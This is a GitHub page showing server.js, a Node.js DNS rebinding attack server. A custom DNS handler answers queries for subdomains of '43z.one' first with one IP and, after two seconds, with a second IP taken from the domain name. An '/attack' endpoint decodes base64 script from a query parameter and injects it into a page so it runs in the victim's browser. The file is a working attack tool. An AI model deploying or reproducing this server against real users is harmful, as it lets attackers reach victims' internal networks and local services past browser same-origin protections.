-
Notifications
You must be signed in to change notification settings - Fork 9
/
server.js
75 lines (56 loc) · 1.41 KB
/
server.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
const http = require('http')
const httpPort = 5000
const express = require('express')
const app = express()
app.use(express.static('public'))
const dns = require('named')
const dnsPort = 53
const dnsServer = dns.createServer()
dnsServer.listen(dnsPort, '::ffff:0.0.0.0', ()=> {
console.log(`DNS server is listening on ${dnsPort}`)
})
let cache = {}
dnsServer.on('query', query => {
const domain = query.name()
const type = query.type()
const splits = domain.split('.')
if(domain.indexOf('43z.one') < 0)
return
if(splits.length != 6)
return
if(type != 'A')
return
const ip1 = splits[1].replace(/-/g, '.')
const ip2 = splits[2].replace(/-/g, '.')
if(!cache[domain]){
cache[domain] = {
timeStamp: Date.now()
}
}
let record
if(cache[domain].timeStamp > Date.now() - 2000){
record = new dns.ARecord(ip1)
}else{
record = new dns.ARecord(ip2)
}
query.addAnswer(domain, record, 0)
dnsServer.send(query)
console.log(`DNS A Query for ${domain} replied with ${record.target}`)
})
app.get('/attack', (req, res) => {
if(!req.query.script)
res.end()
const script = new Buffer(req.query.script, 'base64').toString('ascii')
res.end(`
<html>
<script>
setTimeout(function(){
${script}
}, 100)
</script>
</html>
`)
})
app.listen(httpPort,'127.0.0.1', () => {
console.log(`HTTP server is listening on ${httpPort}`)
})